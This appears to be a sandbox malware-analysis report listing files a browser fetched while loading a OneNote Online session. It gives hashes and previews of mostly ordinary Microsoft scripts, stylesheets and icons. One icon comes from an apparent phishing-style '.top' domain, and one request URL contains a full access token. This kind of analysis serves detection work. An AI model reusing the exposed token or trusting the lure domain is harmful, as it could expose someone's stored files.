                                                                                      SHA1:027B6EDDE1688950000D6CA19E997C79E03E2C77
                                                                                      SHA-256:9AFCD14B4FC43E6D091C9A73564E28CA513FB536C19F78C7CA483DF29E610B44
                                                                                      SHA-512:DB6EE42902F5BE2582A344590FBC65AC9AC39D2CFE36DBF7E530947B453DB92570328BB46D7E9333D0ABB38057B50A73BB276076F7CD6F6B7FD11425C71632A1
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_App_Scripts/wp5/oreosearchpane.min.js
                                                                                      Preview:function _define_property(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}function _object_spread(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{},a=Object.keys(n);"function"==typeof Object.getOwnPropertySymbols&&(a=a.concat(Object.getOwnPropertySymbols(n).filter((function(e){return Object.getOwnPropertyDescriptor(n,e).enumerable})))),a.forEach((function(t){_define_property(e,t,n[t])}))}return e}function ownKeys(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var a=Object.getOwnPropertySymbols(e);t&&(a=a.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,a)}return n}function _object_spread_props(e,t){return t=null!=t?t:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):ownKeys(Object(t)).forEach((function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(t,n))})),e}(globalThis.onenote
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (672)
                                                                                      Category:dropped
                                                                                      Size (bytes):2347861
                                                                                      Entropy (8bit):5.637983408571914
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:EEB61E4E3B09AB99B1BDB48A68DE3B0F
                                                                                      SHA1:474B169E13CF3BB1AC0101E915B59612AC025649
                                                                                      SHA-256:9305C186BFA36C3F54D99504658E9B49840DCEB94B9AE62699AA93766D665AA0
                                                                                      SHA-512:C2D497BACB0BF140C502ACC164C05D0DF3BA38E6DFC4494B38D152D85A71DBD46FB99D8F6025CF137879DE3C906D04E99856F045EB8759DA3D06E30AE4419282
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:'use strict';(globalThis.dullscriptWebpackJsonp=globalThis.dullscriptWebpackJsonp||[]).push([[1],{97731:function(ya,Sa,H){H.d(Sa,{a:function(){return ha}});ya=H(61673);var Ba=H(66215),Fa=H(1496),na=H(22069),C=H(8562),L=H(4840),d=H(39388),k=H(40343),h=H(64233),l=H(22950),w=H(31929),u=H(32031),z=H(88460),x=H(21754),y=H(16648),A=H(88087),F=H(43016),K=H(89335),G=H(25508),t=H(62994),J=H(94801),N=H(28828),O=H(78033),D=H(39188),Q=H(82220),n=H(24438),M=H(88052),Z=H(95681),T=H(40613),P=H(86737);class W{constructor(){this.pressure=.this.pageY=this.pageX=this.y=this.x=0}}(0,ya.a)(W,"InkPacket",null,[]);var ea=H(46545),da=H(86645),ba=H(93427),ua=H(93920),la=H(44405);class ha{static get wuc(){return L.a.instance.resolve("OneNote.IInkEditor")}static get e2(){return d.FocusManager.instance()}static get mbb(){return ha.Ee||(ha.Ee=L.a.instance.resolve("Box4.ICaretPositionManager"))}static get Usa(){return ha.eb||(ha.eb=L.a.instance.resolve("Box4.ICevViewContentManager"))}static ir(){return ha.zh||(ha.z
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):16
                                                                                      Entropy (8bit):3.875
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:D6B82198AF25D0139723AF9E44D3D23A
                                                                                      SHA1:D60DEEF1847EEEF1889803E9D3ADC7EDA220F544
                                                                                      SHA-256:A5C8CC49FA6649BE393EF22C2B31F1C46B671F8D763F783ED6D7B4E33669BDA3
                                                                                      SHA-512:B21BEE2EEC588308A9DC3C3C2405377704B39B08AA20CBA40BA6E6834E67CF6F2C086E0701F5B05AEE27E2677E9C5C24FF137318275ACA00DD063DF3DCC07D4D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAlh7hEpJFPxCBIFDVd69_0=?alt=proto
                                                                                      Preview:CgkKBw1Xevf9GgA=
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):532935
                                                                                      Entropy (8bit):4.395072076018468
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:41357E3B962E967BC44D72B3DA22478A
                                                                                      SHA1:C92D60811E9BB815D32F61E55E9EAF491546FA5D
                                                                                      SHA-256:08DBB36DDCA31F436328FF92E111186CAB0BE844E91A287AAF1274F4D0B9B3C7
                                                                                      SHA-512:6327672EA083A2F268ED0F5F77BC8EEA9C5594359806A30DD96DA491E2E0116C3E0DF60EDDBECD14D44B69A18CBBC9B17ABDC53F3F3B66ECAEEDC21564E635C7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_App_Scripts/1033/onenote-ribbon-sprite-lazy.min.js
                                                                                      Preview:window.onenoteRibbonSpriteLazy={icons:[{type:"svg",id:"newdocument_20",children:[{type:"path",className:"OfficeIconColors_HighContrast",d:"M 1741 614 v 1332 h -1434 v -1844 h 922 m 0 512 h 367 l -367 -373 m 409 476 h -512 v -512 h -716 v 1638 h 1228 z"},{type:"path",className:"OfficeIconColors_m20",d:"M 1685 1903 h -1320 v -1735 h 868 l 452 451 z"},{type:"path",className:"OfficeIconColors_m22",d:"M 1741 614 v 1332 h -1434 v -1844 h 922 m 0 512 h 367 l -367 -373 m 409 476 h -512 v -512 h -716 v 1638 h 1228 z"}],viewBox:"0,0,2048,2048"},{type:"svg",id:"SectionTab_20",children:[{type:"path",className:"OfficeIconColors_HighContrast",d:"M 1229 307 v -205 h 102 v 1844 h -102 v -205 h -615 v -1434 z"},{type:"path",className:"OfficeIconColors_DynamicColor",d:"M 1229 307 v -205 h 102 v 1844 h -102 v -205 h -615 v -1434 z"}],viewBox:"0,0,2048,2048"},{type:"svg",id:"Table_20",children:[{type:"path",className:"OfficeIconColors_HighContrast",d:"M 102 102 h 1844 v 1844 h -1844 m 103 -1741 v 205 h 16
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):28
                                                                                      Entropy (8bit):4.137537511266052
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:292452D9158CA5211CEB7B3FB1D71E28
                                                                                      SHA1:DE9347FB1604A4AADB4230CA87B9D9CADC98629E
                                                                                      SHA-256:D6700E797D44FC7A78934BB9FC6C435027F1D23587B097003E3A84BD1B4E3333
                                                                                      SHA-512:96F78888DEE4435B67982562B1A6BF4FFB084654F30AD616A3B2BBFD31DFDE4BB811116FD1C7A3C0CF7A52394EC4B84E70B82681570912448F965EF4F776CA79
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSFwm6uBqXtyt2JxIFDdjY4LISBQ11LGDr?alt=proto
                                                                                      Preview:ChIKBw3Y2OCyGgAKBw11LGDrGgA=
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):291944
                                                                                      Entropy (8bit):5.339452624635816
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:4753311527A079EC0CC7E95D043B12C4
                                                                                      SHA1:ECDDDE593B9BB99B9AF52572ACE99AE8668D23D8
                                                                                      SHA-256:E1A86909453E1BFDB18F961D9148601D54308E5C7A7826DFD79A7264A53B6E6A
                                                                                      SHA-512:5149EFEE6039AF9794E068DCCCC3E1200A9705552742C3C3072E19112EF27108EC287F55474F42603A651B55BCF73ABD426D6CB7DDDEC2E27AFF587FCB289F7C
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:function _define_property(t,e,r){return e in t?Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,writable:!0}):t[e]=r,t}function _object_spread(t){for(var e=1;e<arguments.length;e++){var r=null!=arguments[e]?arguments[e]:{},i=Object.keys(r);"function"==typeof Object.getOwnPropertySymbols&&(i=i.concat(Object.getOwnPropertySymbols(r).filter((function(t){return Object.getOwnPropertyDescriptor(r,t).enumerable})))),i.forEach((function(e){_define_property(t,e,r[e])}))}return t}(globalThis.onenoteOnlineChunks=globalThis.onenoteOnlineChunks||[]).push([[848],{85663:function(t,e,r){t.exports={default:r(79476),__esModule:!0}},35594:function(t,e,r){t.exports={default:r(29589),__esModule:!0}},12171:function(t,e,r){t.exports={default:r(72230),__esModule:!0}},5917:function(t,e,r){t.exports={default:r(24414),__esModule:!0}},80401:function(t,e,r){t.exports={default:r(3210),__esModule:!0}},75012:function(t,e,r){t.exports={default:r(10306),__esModule:!0}},61525:function(t,e,r){t.exports={d
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65443)
                                                                                      Category:downloaded
                                                                                      Size (bytes):734469
                                                                                      Entropy (8bit):5.519143735413564
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:9F5073B64B56A4C8D0B1B596C3D05FFD
                                                                                      SHA1:CAFAD76BE15AC0B9E3B48AF173D2EFE02B5C416F
                                                                                      SHA-256:8B6BA39147DC3BA407A6D00A31C665194A425D95BC3F8F6284C52A2008E73C5E
                                                                                      SHA-512:B488EBB48BEEBBDE0BEBDCD652C3B9057C1008D067308B68179BF1C6C4C122021A044FB0D9177E0BC8FB9BE4E715C7205A2084017BB6F3A6D423860C34A920A3
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_App_Scripts/Feedback/latest/officebrowserfeedback_floodgate.js
                                                                                      Preview:/*! For license information please see officebrowserfeedback_floodgate.min.js.LICENSE.txt */.!function(e){var t={};function A(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,A),r.l=!0,r.exports}A.m=e,A.c=t,A.d=function(e,t,n){A.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},A.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},A.t=function(e,t){if(1&t&&(e=A(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(A.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)A.d(n,r,function(t){return e[t]}.bind(null,r));return n},A.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return A.d(t,"a",t),t},A.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},A.p="",A(A.s=
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):2
                                                                                      Entropy (8bit):1.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                      SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                      SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                      SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:{}
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):112261
                                                                                      Entropy (8bit):5.13097356220368
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:1DC889AC693F912C263AA6D27A258A93
                                                                                      SHA1:B2100EA2AEE5ED5FD90E0331F26160CDD5D1B002
                                                                                      SHA-256:9224E5240ABC039D55CB765EA6611F07BA95F5E59C05DA325C968470946C6E52
                                                                                      SHA-512:49654A757D9C5CFD838848AF856B2A0D9FE9960CEED297E4244F948E42441506B7502DBED1236448BFF09EF4444FDF20A25197DC7E55FC4394EB2ED70CB1B0ED
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_App_Scripts/onenoteink.js
                                                                                      Preview:var onenoteink;(()=>{"use strict";var t={699:t=>{var e,i="object"==typeof Reflect?Reflect:null,n=i&&"function"==typeof i.apply?i.apply:function(t,e,i){return Function.prototype.apply.call(t,e,i)};e=i&&"function"==typeof i.ownKeys?i.ownKeys:Object.getOwnPropertySymbols?function(t){return Object.getOwnPropertyNames(t).concat(Object.getOwnPropertySymbols(t))}:function(t){return Object.getOwnPropertyNames(t)};var o=Number.isNaN||function(t){return t!=t};function s(){s.init.call(this)}t.exports=s,t.exports.once=function(t,e){return new Promise((function(i,n){function o(i){t.removeListener(e,s),n(i)}function s(){"function"==typeof t.removeListener&&t.removeListener("error",o),i([].slice.call(arguments))}g(t,e,s,{once:!0}),"error"!==e&&function(t,e,i){"function"==typeof t.on&&g(t,"error",e,{once:!0})}(t,o)}))},s.EventEmitter=s,s.prototype._events=void 0,s.prototype._eventsCount=0,s.prototype._maxListeners=void 0;var r=10;function a(t){if("function"!=typeof t)throw new TypeError('The "listener
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):3805
                                                                                      Entropy (8bit):5.452649976783875
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:8475129A8EEA7CC6AB0677093AEEE597
                                                                                      SHA1:38CC0DBD6A1FD57106B0E21DF43AE7EEACF351C9
                                                                                      SHA-256:BF8288FFF3B25E34DF7DF001B0F6F32614D6CC81B6886854E68A8911C08DB535
                                                                                      SHA-512:C6DE6D7B91A1BFA3DCD24ABD898B699D5FA403F82145DFCB81C460C49881CA8B40F69FC9403F9B0D4692FA6F979953A7B9BD1D27330A254C931736054D807D69
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:....<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">....<html xmlns="http://www.w3.org/1999/xhtml">...<head><title>....</title>....<style id="sharedauthstyles" nonce="193728a4-9ce5-41a6-9cfa-43b5811c882d"></style>....<script type="text/javascript" nonce="bf48765a-0576-4c32-a6e6-1734296a3ac2">.....function loadBackupScript() {......var backupScript = document.createElement('script');......backupScript.setAttribute("data-allowedapps", "");......backupScript.setAttribute("data-allowedaudiences", "");......backupScript.setAttribute("data-origin", "");......backupScript.setAttribute("data-scriptload", "PRODUCTION.100: 20241022.4");......script.setAttribute("fetchpriority", "high");......backupScript.id = "sharedauthscript";......backupScript.src = "https://wise-m-backup.public.onecdn.static.microsoft/wise/owl/sharedauthclientmsal.39dcdf70a2434436117b.js";......backupScript.integrity = "sha384-tpvjg53cnAY5Ku4H8RkNIKuRYP
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                      Category:downloaded
                                                                                      Size (bytes):513
                                                                                      Entropy (8bit):4.720499940334011
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:A9CC2824EF3517B6C4160DCF8FF7D410
                                                                                      SHA1:8DB9AEBAD84CA6E4225BFDD2458FF3821CC4F064
                                                                                      SHA-256:34F9DB946E89F031A80DFCA7B16B2B686469C9886441261AE70A44DA1DFA2D58
                                                                                      SHA-512:AA3DDAB0A1CFF9533F9A668ABA4FB5E3D75ED9F8AFF8A1CAA4C29F9126D85FF4529E82712C0119D2E81035D1CE1CC491FF9473384D211317D4D00E0E234AD97F
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://mohrhydrokultur.adaradocumentfolder.top/left_/BkeDp76AF6glVIj
                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><title>assets</title><path d="M18,11.578v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944.594.594L7.617,11.578Z" fill="#404040"/><path d="M10.944,7.056l.594.594L7.617,11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" fill="#404040"/></svg>
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):1233
                                                                                      Entropy (8bit):5.464953219409053
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:11CA4578CB026A23713AEA6781B8ECE3
                                                                                      SHA1:A05AE51B4A3E2E0076222CBCBE9C58833CDEF108
                                                                                      SHA-256:C55F527E536DE44C7980FECECE7428AE5A765647495E47008A8A54FA1E434736
                                                                                      SHA-512:5F57C749A78FF8DFA4D172A11A179D9EC9E036C0A6B2C6059F79B2DCF1114A3D289104B68316B4913A01C54FBBE07FF38D1648BB8534B510C3797433AF6B2158
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://onenote.officeapps.live.com/o/AddinServiceHandler.ashx?action=laststoreupdate&app=4&lc=EN-US&WOPIsrc=https%3A%2F%2Fmy%2Emicrosoftpersonalcontent%2Ecom%2Fpersonal%2F3e563d3fb2a98d1c%2F%5Fvti%5Fbin%2Fwopi%2Eashx%2Ffolders%2F3E563D3FB2A98D1C%21sa5e46869611b4483bcab4817eed24b41&access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6InVYZWhRSlBsZVZqTkNiYWtVaEdENkl5RlFRayJ9%2EeyJhdWQiOiJ3b3BpL215Lm1pY3Jvc29mdHBlcnNvbmFsY29udGVudC5jb21AOTE4ODA0MGQtNmM2Ny00YzViLWIxMTItMzZhMzA0YjY2ZGFkIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE3Mjk3NzE3ODkiLCJleHAiOiIxNzMwMjAwMTg5IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jYjYwM2JhZGZjM2U3MzkyY2ExNjRhOGNmYjI3MTdmNjMwNjAzMmJkZGU2MDc3NTVlYjExZmMyMzk5YjU4MTlmZiIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jYjYwM2JhZGZjM2U3MzkyY2ExNjRhOGNmYjI3MTdmNjMwNjAzMmJkZGU2MDc3NTVlYjExZmMyMzk5YjU4MTlmZiIsInNoYXJpbmdpZCI6Ijc0dHZuZVRmb1VhazRjN1k5VWhaWXciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6ImE1ZTQ2ODY5NjExYjQ0ODNiY2FiNDgxN2VlZDI0YjQxO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDs4OTA3YWY4NGM4NzM0NWM4OGIzNjdiYTNhMGFjMDFkMjs7VHJ1ZTs7OzM4NDA7YmIwOTVkYTEtODAxNC1hMDAwLTIzZGItMTk4MDI0ODIwYjAyIiwiZmlkIjoiMTg5NjcyIn0%2EimDvqZ%2D5CbTiarygxRgcMOo0G1lmJnAkavLrzo2T6NhdcJ0hGUX%2DYut4QG7LhNf%2DSu7KNayj2nI%5FapNA6ZPBGsBsNqmbvdui%2D0%2DGFr98NjtGRKYKdMCLp9Xq3f5WyahYFNONOmJ5ZQAJM7RkQHvLgaB88onsugZxkFkZhg89CwLkVtxQYITMs3sL7ReyqA3Bw9w9dq39VY0jSuOqeunPkzwdIxKx2I%5FtD4WCJBGA%2DW%5FuwLMgV5UXGQg25BWA5mbZ1i0A%2DYbXfpIlI9NVuKMoegu0AbPMFVp170gFvfbrwFXdQ%2DXGMxJlXDtGgbk2wOrX44viUbfDbeygF588wlvE1g&access_token_ttl=1730200189694
                                                                                      Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>403 - Forbidden: Access is denied.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (18992), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):19181
                                                                                      Entropy (8bit):4.3590974373798
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:D9604CC18F364A6ADE707B7FAAEC642C
                                                                                      SHA1:F38F0B94764184D4373886FDA1CA87D352BFCE5A
                                                                                      SHA-256:F282423F48F12F56419363384F3B10002C8D3D106BC1AC8FF721602AA2B2FD9B
                                                                                      SHA-512:7B305607B79F077539E3C37CD46EAFBB9E4C9B2A8825217187515CD20FFBFE204BAC43E918CD4440EB65A3A2DCFFC4140D06B43845613D48566448765B3D5DF4
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:.var AutoCorrectList={"(c)":".","(r)":".","(tm)":".","...":".","abbout":"about","abotu":"about","abouta":"about a","aboutit":"about it","aboutthe":"about the","abscence":"absence","accesories":"accessories","accidant":"accident","accomodate":"accommodate","accordingto":"according to","accross":"across","acheive":"achieve","acheived":"achieved","acheiving":"achieving","acn":"can","acommodate":"accommodate","acomodate":"accommodate","actualyl":"actually","additinal":"additional","addtional":"additional","adequit":"adequate","adequite":"adequate","adn":"and","advanage":"advantage","affraid":"afraid","afterthe":"after the","againstt he":"against the","aganist":"against","aggresive":"aggressive","agian":"again","agreemeent":"agreement","agreemeents":"agreements","agreemnet":"agreement","agreemnets":"agreements","agressive":"aggressive","ahppen":"happen","ahve":"have","allwasy":"always","allwyas":"always","almots":"almost","almsot":"almost","alomst":"almost","alot":"a lot","alraedy":
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):472483
                                                                                      Entropy (8bit):5.395467136654138
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:76328F92AA8FCDC94FBCB570CE57D76C
                                                                                      SHA1:CA9D64B517CD0E8474F8FCFF4101B3A88E5F9EB2
                                                                                      SHA-256:E15A3B74A760F470FE602177F03B496FED3243E19CCD6BC359AD48DE7E5C4F11
                                                                                      SHA-512:2B5CB8391A783DFCED1BD5F4CF4DE85D28D42BA251B6596CC19A8E0DAA12B4D7E51B0B81BE3DD4D0CB99140C20AE01E7014597222BBD4E46D7206B590D9F4F7B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/hE15A3B74A760F470_resources/1033/OneNote.Refresh.css
                                                                                      Preview:.headBrand{cursor:default;line-height:48px;font-size:22px;margin-left:20px;margin-right:20px;font-family:'SegoeUI-SemiLight-final','Segoe UI SemiLight','Segoe UI WPC Semilight','Segoe UI',Segoe,Tahoma,Helvetica,Arial,sans-serif;}.cui-topBar1-transistionalHeaderUI .headBrand{width:auto !important;height:24px !important;line-height:normal !important;padding-bottom:12px;padding-top:12px;display:inline-block;font-size:17px;font-family:inherit;margin-left:17px;margin-right:17px;font-family:'Segoe UI','Segoe UI Web',Arial,Verdana,sans-serif;}.cui-topBar1-transitionalReactHeaderUI .headBrand{width:auto !important;line-height:48px !important;padding:0 6px;display:inline-block;font-size:16px;font-weight:600;font-family:"Segoe UI","Segoe UI Web (West European)","Segoe UI",-apple-system,BlinkMacSystemFont,Roboto,"Helvetica Neue",sans-serif;}@font-face{font-family:"Segoe UI Web Light";font-style:normal;font-weight:normal;src:local("Segoe UI Light"),url('./segoeuil.woff') format('woff'),url('./sego
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 452 x 444, 8-bit/color RGBA, non-interlaced
                                                                                      Category:downloaded
                                                                                      Size (bytes):51120
                                                                                      Entropy (8bit):7.954718383506729
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:ECA50172A6583B16E553E9917FB710FB
                                                                                      SHA1:2FD7FB2FF5C10E17E9066CE6BD2393E1F6B93CC0
                                                                                      SHA-256:FFF5919A2CBACEAE0528522B6C73E4F1D549CA8EE13C680B50ED377DFD2B61F0
                                                                                      SHA-512:1E7591A35DE7C00A197C08F15BA9ED7A9014EFFEF03DB240A92B63F8A8EC8DAE8F02811C8E9696FA934E6C4EFCBBBA14F2D01082A63471092488850A2D16958B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_resources/1033/m2/one.png
                                                                                      Preview:.PNG........IHDR.............@.....wIDATx^..xU......n{..W.;.:T.W-W......I..hD..V..U..P@..A.@H....-.HEF..."....."zE@.B......OY~..s.:{.=.....?{.....N~..z.w..............T.vmr.k.>=.....~.A.......#.q...u..=..I...gee6 .v---.$.".L..=W>kD.+@... ...z..yd...s...mhK..:.avvf._........F.N.........x...*.?.b.US.|~ii....W.V.w..-}|...n*//g..7..h..R.m{............X..+&U.....=...h.....B$../......*0lll.@.+..l....l.&.o.x9..7.Y.1{.....G...w..-}...>..u."....1h(n.t......m.....X.kIf .i..]...{A......+.g...m=....'//..k=..A|.v.8&.....!..>.}W.!.D.......s..x....w.a..Mr.....,P.KxII....5.~.>.%..1..1......y.P...w(..{..O ..n.V..Oh...iC[7.x...*.\..(..D.C...}....}..?...>%...".~0b..g.Yy...^.|./..+@.7.z.D.|*==.9.c....g..m|.]ZZ.^..b}b.....D..ly..3:.P.`BE.+.6..b....1..9...\.." ............7....]r.c.&."...-/.OJ6.........2.c.....pA.Z.................?.Z.x....r.E?`........}W>..c...g@i.."P.kUVQ/..^.........BQ....WguU.E...%1`@.F....}Uax..f..".`,.t..V .9.7..E...[Sm...y.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                      Category:dropped
                                                                                      Size (bytes):1592
                                                                                      Entropy (8bit):4.205005284721148
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:4E48046CE74F4B89D45037C90576BFAC
                                                                                      SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                                                      SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                                                      SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                                                      Malicious:false
                                                                                      Reputation:unknown
